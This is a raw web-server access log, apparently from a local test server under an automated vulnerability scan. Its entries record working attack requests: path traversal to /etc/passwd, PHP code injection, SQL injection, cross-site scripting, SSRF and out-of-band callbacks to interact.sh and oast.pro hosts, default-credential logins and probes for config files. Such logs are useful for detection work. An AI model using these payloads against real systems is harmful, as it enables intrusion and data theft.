HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/user_add.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29N5Ej7U1W0v5s9hmpRGH2BrL4J HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aplicacao/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor_tools/module?type=files/admin\x22>¶ms=filetype=images HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/authportal/bounce.php?url=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%u002e/WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"page=index');${system('echo lotuscms_rce | md5sum')};#\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lcms/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/production.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/iwp-client/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com@example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"_session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path=29N5EiXVEUzRFjHPXKGV84Mq8aG.htm","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /backend/cms HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ghost/preview HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apt/v1/context HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account/register HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /VisionHubWebApi/api/Login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cloudexp/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%00/WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docs/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/logs/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /production.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:80 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/admin/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/metadata/v1.json HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.271","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bolt/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"Password=29N5EjInz4ptwo5h5wt1jNDjFg0&ConfirmPassword=29N5EjInz4ptwo5h5wt1jNDjFg0&RememberMe=true&__RequestVerificationToken={{csrf}}&RememberMe=false","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/account/register", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sfmc/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /em/console/logon/logon HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php?action=login&type=admin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/_catalog HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"\x0D\x0A pingback.ping\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://ca2tuc8smpv1g2s80ca0otxq31e3nbee1.oast.pro\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://127.0.0.1/?p=1\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wow-company&tab=http://ca2tuc8smpv1g2s80ca0fhd5dnq5ud4rj.oast.pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:80?@example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"{\x22query\x22:\x22query {\x5Cn __schema {\x5Cn directive\x5Cn }\x5Cn}\x22,\x22variables\x22:null}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix= 